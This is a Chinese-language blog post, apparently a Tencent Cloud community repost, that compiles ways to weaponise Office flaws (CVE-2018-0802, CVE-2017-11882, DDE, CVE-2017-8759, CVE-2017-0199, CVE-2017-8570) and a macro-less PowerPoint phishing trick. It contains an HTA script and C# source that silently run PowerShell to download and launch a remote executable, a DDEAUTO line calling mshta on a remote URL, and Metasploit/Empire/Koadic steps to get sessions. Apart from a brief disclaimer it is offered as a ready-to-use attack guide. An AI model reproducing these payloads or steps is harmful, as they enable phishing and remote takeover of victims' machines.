Office漏洞利用大全
最近office又爆出漏洞CVE-2018-0802,身为地地道道的中国人岂能不凑热闹。之前又看到了不少类似的文章,我就把近期比较好玩的有关office的漏洞利用姿势做个合集!
参考链接:
CVE-2018-0802
https://github.com/Ridter/RTF_11882_0802
https://github.com/rxwx/CVE-2018-0802
http://www.freebuf.com/vuls/159789.html
https://evi1cg.me/archives/CVE_2018_0802.html
CVE-2017-11882
https://github.com/Ridter/CVE-2017-11882
https://evi1cg.me/archives/CVE_2017_11882_exp.html
http://www.freebuf.com/vuls/154462.html
DDE
http://www.freebuf.com/articles/system/153105.html
http://www.freebuf.com/articles/terminal/150285.html
http://bobao.360.cn/learning/detail/4592.html
CVE-2017-8759
https://github.com/vysec/CVE-2017-8759
https://bbs.77169.com/forum.php?mod=viewthread&tid=364738
CVE-2017-0199
http://www.91ri.org/16953.html
CVE-2017-8570
http://www.freebuf.com/vuls/144054.html
https://github.com/tezukanice/Office8570
Koadic
https://github.com/zerosum0x0/koadic
Empire
https://github.com/EmpireProject/Empire
我们先看最新的CVE-2018-0802漏洞
大佬的脚本基本都很齐全了,我做一下补充。丢弃kali,用远控来实现。
不言而喻,-I test.rtf来加入CVE-2018-0802的漏洞文档,-c "cmd.exe /c calc.exe"来加入CVE-2017-11882的执行命令。
在这里
https://www.demmsec.co.uk/2018/01/exploiting-fully-patched-office-2016-using-cve-2018-0802/
说明了一种CVE-2018-0802powershell代码的植入方式。然后编译为exe文件,
https://github.com/rxwx/CVE-2018-0802
packager_exec_CVE - 2018 - 0802. py - e executable_path - o output_file_name
生成CVE-2018-0802的漏洞文档。
我们修改一下,在上次CVE-2017-11882的漏洞利用中我们用到了远控上线,当时的HTA代码如下:
Sub window_onload
? window.resizeTo 0,0
? window.MoveTo -100,-100
? const impersonation = 3
? Const HIDDEN_WINDOW = 12
? Set Locator = CreateObject("WScript.Shell")
? Locator.Run"powershell.exe -nop -w hidden -Exec Bypass -Command (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.201/office.exe', $env:APPDATA + '\office.exe'); Start-Process $env:APPDATA'\office.exe'",0,FALSE
? window.close()
end sub
我们将powershell的下载地址替换Empire的代码即可,那么我们的cs文件
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace shell
{
? class Program
? {
? ? ? static void Main(string[] args)
? ? ? {
? ? ? ? ? string strCmdText;
? ? ? ? ? strCmdText = "powershell -nop -w hidden -Exec Bypass -Command (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.201/office.exe', $env:APPDATA + '\office.exe'); Start-Process $env:APPDATA'\office.exe'";
? ? ? ? ? System.Diagnostics.Process.Start("powershell.exe",strCmdText);
? ? ? }
? }
}
我们用csc编辑成exe发现报错,把文件路径换成\\
完成
我们测试exe文件是否可以正常打开上线!没有问题!
最后我们就把CVE-2018-0802和CVE-2017-11882漏洞利用文档综合到一起即可!
2.CVE-2017-11882漏洞,首先使用大宝剑建立链接
PS:大宝剑获取非英文版系统的shell会有报错
UnicodeDecodeError: ‘ascii’ codec can’t decode byte 0xe5 in position 108: ordinal not in ran
解决办法就是在koadic文件中增加utf-8编码
之后使用exp脚本生成文档
复制测试!获得会话!!
宿主进程状态
3.office的DDE应该不用多说了吧,直接开搞
新建word文档,按下CTRL+F9
在其中插入
DDEAUTO?c:\\windows\\system32\\cmd.exe?“/k?mshta http://192.168.188.147:66/LaLHL”
保存即可!然后打开测试!
获得会话!
宿主进程状态
更多姿势:http://bobao.360.cn/learning/detail/4592.html
4.CVE-2017-8759的复现,这个漏洞本身是.NET的问题……话不说直接开干!
在kali中使用Empire生成HTA后门
修改exploit.txt文件
开启apache或者使用python -m SimpleHTTPServer建立链接
并且把HTA上传到同一路径下。
然后使用word新建一个rtf,插入一个链接到文件的对象
http://192.168.1.118:808/exploit.txt
然后使用C32编辑blob.bin,修改位置如下
右键拷贝HEX格式所有,使用编辑器打开rtf文件替换代码
再将objautlink前插入objupdate
保存修改后我们测试一下效果!
(o゜▽゜)o☆[BINGO!]
5.CVE-2017-0199的话就更简单了…
下载漏洞利用脚本
wget https://raw.githubusercontent.com/nixawk/metasploit-framework/3d082814cbedc065f329498b9c6fb7951f8ebbd5/modules/exploits/windows/fileformat/office_word_hta.rb
然后移动rb脚本到/usr/share/metasploit-framework/modules/exploits/windows/fileformat,然后打开msf生成hta文件链接
然后使用刚才下载的exp设置参数
Run后复制文件到靶机测试
查看会话
6.CVE-2017-8570同样还是一梭子搞定!
使用脚本生成恶意ppsx文件
使用msfvenom生成exe后门
再次使用脚本建立链接
打开msf建立监听
复制文件测试!获得会话!!
最后再普及一个姿势!
无需加载宏之PPTX钓鱼
首先新建一个PPT,插入内容
勾选文字插入动作
鼠标移过时的动作,选择运行程序
这里咱们插入一段powershell代码
之后把它插入到运行程序选项框里
确定保存就可以了,咱们测试一下。
当鼠标滑过…
(o゜▽゜)o☆[BINGO!]
PS:也可将动作插入到形状里面的空白动作按钮
然后覆盖全屏,并设置无线条无填充
攻防无绝对,技术无黑白
技术仅供测试使用,请勿用做非法用途!
你可能喜欢最新变种利用OFFICE漏洞绕过多家杀软最新Office 0day漏洞(CVE-2017-11826)在野攻击通告Office最新0day漏洞 所有Word版本受影响
- 发表于:
- 原文链接:http://kuaibao.qq.com/s/20180504B0G2X200?refer=cp_1026
- 腾讯「腾讯云开发者社区」是腾讯内容开放平台帐号(企鹅号)传播渠道之一,根据《腾讯内容开放平台服务协议》转载发布内容。
- 如有侵权,请联系 cloudcommunity@tencent.com 删除。
相关快讯
扫码
添加站长 进交流群
领取专属 10元无门槛券
私享最新 技术干货
腾讯云开发者
